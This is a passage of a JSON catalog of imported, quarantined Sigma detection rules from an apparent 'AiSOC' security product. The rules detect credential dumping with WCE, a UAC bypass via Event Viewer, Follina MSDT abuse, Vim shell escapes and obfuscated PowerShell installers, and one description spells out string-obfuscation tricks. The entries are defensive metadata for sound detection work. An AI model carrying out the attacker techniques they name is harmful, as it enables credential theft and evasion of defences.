"mitre_techniques": [ "T1059", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-stracciatella-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml" } }, { "id": "sigmahq-sigma-7a74da6b-ea76-47db-92cc-874ad90df734", "type": "detection", "name": "Suspicious MSDT Parent Process", "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msdt-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a74da6b-ea76-47db-92cc-874ad90df734", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" } }, { "id": "sigmahq-sigma-7a922f1b-2635-4d6c-91ef-af228b198ad3", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" } }, { "id": "sigmahq-sigma-7aa4e81a-a65c-4e10-9f81-b200eb229d7d", "type": "detection", "name": "Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script", "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script to run for a specific VM state", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-vmwaretoolboxcmd-exe-vm-state-change-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7aa4e81a-a65c-4e10-9f81-b200eb229d7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml" } }, { "id": "sigmahq-sigma-7aa7009a-28b9-4344-8c1f-159489a390df", "type": "detection", "name": "HackTool - Windows Credential Editor (WCE) Execution", "description": "Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.\nIt is often used by threat actors for credential dumping and lateral movement within compromised networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-windows-credential-editor-wce-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7aa7009a-28b9-4344-8c1f-159489a390df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_wce.yml" } }, { "id": "sigmahq-sigma-7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "type": "detection", "name": "Vulnerable Driver Load", "description": "Detects loading of known vulnerable drivers via their hash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_vuln_drivers.yml" } }, { "id": "sigmahq-sigma-7ab8f73a-fcff-428b-84aa-6a5ff7877dea", "type": "detection", "name": "Vim GTFOBin Abuse - Linux", "description": "Detects the use of \"vim\" and it's siblings commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vim-gtfobin-abuse-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_vim_shell_execution.yml" } }, { "id": "sigmahq-sigma-7ac407cc-0f48-4328-aede-de1d2e6fef41", "type": "detection", "name": "Standard User In High Privileged Group", "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/standard-user-in-high-privileged-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml" } }, { "id": "sigmahq-sigma-7b10f171-7f04-47c7-9fa2-5be43c76e535", "type": "detection", "name": "Visual Basic Command Line Compiler Usage", "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-basic-command-line-compiler-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" } }, { "id": "sigmahq-sigma-7b14c76a-c602-4ae6-9717-eff868153fc0", "type": "detection", "name": "HackTool - NoFilter Execution", "description": "Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134", "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-nofilter-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b14c76a-c602-4ae6-9717-eff868153fc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_hktl_nofilter.yml" } }, { "id": "sigmahq-sigma-7b434893-c57d-4f41-908d-6a17bf1ae98f", "type": "detection", "name": "Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location", "description": "Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-from-process-located-in-potentially-suspicious-or-u.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml" } }, { "id": "sigmahq-sigma-7b449a5e-1db5-4dd0-a2dc-4e3a67282538", "type": "detection", "name": "Hidden Local User Creation", "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-local-user-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_hidden_user_creation.yml" } }, { "id": "sigmahq-sigma-7b4f794b-590a-4ad4-ba18-7964a2832205", "type": "detection", "name": "Renamed Vmnat.exe Execution", "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-vmnat-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b4f794b-590a-4ad4-ba18-7964a2832205", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" } }, { "id": "sigmahq-sigma-7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "type": "detection", "name": "Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution", "description": "Detects potentially suspicious child processes launched via the ScreenConnect client service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-potential-suspicious-remote-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml" } }, { "id": "sigmahq-sigma-7b687634-ab20-11ea-bb37-0242ac130002", "type": "detection", "name": "Windows Pcap Drivers", "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-pcap-drivers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b687634-ab20-11ea-bb37-0242ac130002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_pcap_drivers.yml" } }, { "id": "sigmahq-sigma-7b6a7418-3afc-11f0-aff4-000d3abf478c", "type": "detection", "name": "Obfuscated PowerShell MSI Install via WindowsInstaller COM", "description": "Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).\nThe technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting\nmalformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection\nby hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with\nhidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.010", "T1218.007", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/obfuscated-powershell-msi-install-via-windowsinstaller-com.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b6a7418-3afc-11f0-aff4-000d3abf478c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_comobject_msi.yml" } }, { "id": "sigmahq-sigma-7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "type": "detection", "name": "Execute Invoke-command on Remote Host", "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-invoke-command-on-remote-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" } }, { "id": "sigmahq-sigma-7bbc309f-e2b1-4eb1-8369-131a367d67d3", "type": "detection", "name": "Too Many Global Admins", "description": "Identifies an event where there are there are too many accounts assigned the Global Administrator role.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/too-many-global-admins.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7bbc309f-e2b1-4eb1-8369-131a367d67d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml" } }, { "id": "sigmahq-sigma-7bd3902d-8b8b-4dd4-838a-c6862d40150d", "type": "detection", "name": "DNS HybridConnectionManager Service Bus", "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-hybridconnectionmanager-service-bus.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" } }, { "id": "sigmahq-sigma-7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "type": "detection", "name": "HackTool - LittleCorporal Generated Maldoc Injection", "description": "Detects the process injection of a LittleCorporal generated Maldoc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1055.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-littlecorporal-generated-maldoc-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml" } }, { "id": "sigmahq-sigma-7be5fb68-f9ef-476d-8b51-0256ebece19e", "type": "detection", "name": "Suspicious Execution of Hostname", "description": "Use of hostname to get information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-hostname.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hostname_execution.yml" } }, { "id": "sigmahq-sigma-7c06ab9b-b1d2-4ba9-b06e-09491ded20d9", "type": "detection", "name": "System Restore Registry Modification via CommandLine", "description": "Detects system restore registry modification via command line, which can be used by adversaries to disable system restore on the computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-restore-registry-modification-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c06ab9b-b1d2-4ba9-b06e-09491ded20d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_system_restore_modification.yml" } }, { "id": "sigmahq-sigma-7c0dcd3d-acf8-4f71-9570-f448b0034f94", "type": "detection", "name": "PsExec Service Child Process Execution as LOCAL SYSTEM", "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-service-child-process-execution-as-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml" } }, { "id": "sigmahq-sigma-7c3b43d8-d794-47d2-800a-d277715aa460", "type": "detection", "name": "Scheduled Cron Task/Job - MacOs", "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-cron-task-job-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c3b43d8-d794-47d2-800a-d277715aa460", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" } }, { "id": "sigmahq-sigma-7c797da2-9cf2-4523-ba64-33b06339f0cc", "type": "detection", "name": "AWS ElastiCache Security Group Modified or Deleted", "description": "Identifies when an ElastiCache security group has been modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-elasticache-security-group-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c797da2-9cf2-4523-ba64-33b06339f0cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-7c81fec3-1c1d-43b0-996a-46753041b1b6", "type": "detection", "name": "UAC Bypass via Event Viewer", "description": "Detects UAC bypass method using Windows event viewer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-event-viewer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" } }, { "id": "sigmahq-sigma-7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "type": "detection", "name": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-iis-url-globalrules-rewrite-via-appcmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" } }, { "id": "sigmahq-sigma-7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "type": "detection", "name": "File And SubFolder Enumeration Via Dir Command", "description": "Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1217" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-and-subfolder-enumeration-via-dir-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml" } }, { "id": "sigmahq-sigma-7cb02516-6d95-4ffc-8eee-162075e111ac", "type": "detection", "name": "Successful IIS Shortname Fuzzing Scan", "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/successful-iis-shortname-fuzzing-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cb02516-6d95-4ffc-8eee-162075e111ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml" } }, { "id": "sigmahq-sigma-7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "type": "detection", "name": "Potential Execution of Sysinternals Tools", "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-execution-of-sysinternals-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" } }, { "id": "sigmahq-sigma-7cce6fc8-a07f-4d84-a53e-96e1879843c9", "type": "detection", "name": "Potential Binary Impersonating Sysinternals Tools", "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection.\nThis rule looks for the execution of binaries that are named similarly to Sysinternals tools.\nAdversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": 